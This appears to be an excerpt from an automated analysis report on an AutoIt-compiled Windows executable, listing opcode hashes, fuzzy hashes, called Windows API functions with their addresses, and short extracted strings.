                                                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                APIs
                                                • _wcslen.LIBCMT ref: 00466825
                                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                Strings
                                                Similarity
                                                • API ID: CrackInternet_wcslen
                                                • String ID: |
                                                • API String ID: 596671847-2343686810
                                                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                APIs
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                Strings
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                APIs
                                                • _strlen.LIBCMT ref: 0040F858
                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                • _sprintf.LIBCMT ref: 0040F9AE
                                                Strings
                                                Similarity
                                                • API ID: _memmove$_sprintf_strlen
                                                • String ID: %02X
                                                • API String ID: 1921645428-436463671
                                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                Strings
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                Strings
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                Strings
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: htonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 3832099526-2422070025
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                Strings
                                                Similarity
                                                • API ID: InternetOpen
                                                • String ID: <local>
                                                • API String ID: 2038078732-4266983199
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: u,D
                                                • API String ID: 4104443479-3858472334
                                                APIs
                                                • _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 00401B57
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                Strings
                                                Similarity
                                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                • String ID: @EXITCODE
                                                • API String ID: 2734553683-3436989551
                                                APIs
                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • wsprintfW.USER32 ref: 0045612A
                                                Strings
                                                Similarity
                                                • API ID: MessageSend_mallocwsprintf
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 1262938277-328681919
                                                APIs
                                                • InternetCloseHandle.WININET(?), ref: 00442663
                                                • InternetCloseHandle.WININET ref: 00442668
                                                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                Strings
                                                Similarity
                                                • API ID: CloseHandleInternet$ObjectSingleWait
                                                • String ID: aeB
                                                • API String ID: 857135153-906807131
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                • PostMessageW.USER32(00000000), ref: 00441C05
                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                Strings
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                Strings
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                Strings
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283